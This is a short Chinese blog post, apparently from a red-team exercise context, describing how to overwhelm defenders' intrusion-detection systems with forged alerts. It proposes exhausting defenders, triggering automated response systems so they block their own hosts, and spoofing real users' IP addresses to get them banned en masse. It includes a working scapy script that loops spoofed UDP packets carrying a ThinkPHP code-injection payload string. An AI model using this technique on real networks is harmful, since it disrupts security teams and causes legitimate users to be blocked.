scapy attack snort

hw的时候防守方都是几百号人对几支攻击队,加上内网一大堆告警设备有些烦

一个恶心流量设备的小方法,可以通过伪造告警,耗尽防守方体力

还可以通过组合告警流量,来触发nids的soar,实现让他们自己封禁自己,也可以引入纯真ip池,让他们大规模封禁真实用户

demo

#!/usr/bin/env python

from scapy.all import *

packet_ip = IP(src="192.168.1.222", dst="192.168.1.143")

udp_3 = UDP(sport=4444, dport=16464)
payload_3 = "index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=18"

packet_3 = packet_ip / udp_3 / payload_3

packets = [packet_3]

send(packets, loop=1)
updatedupdated2022-04-052022-04-05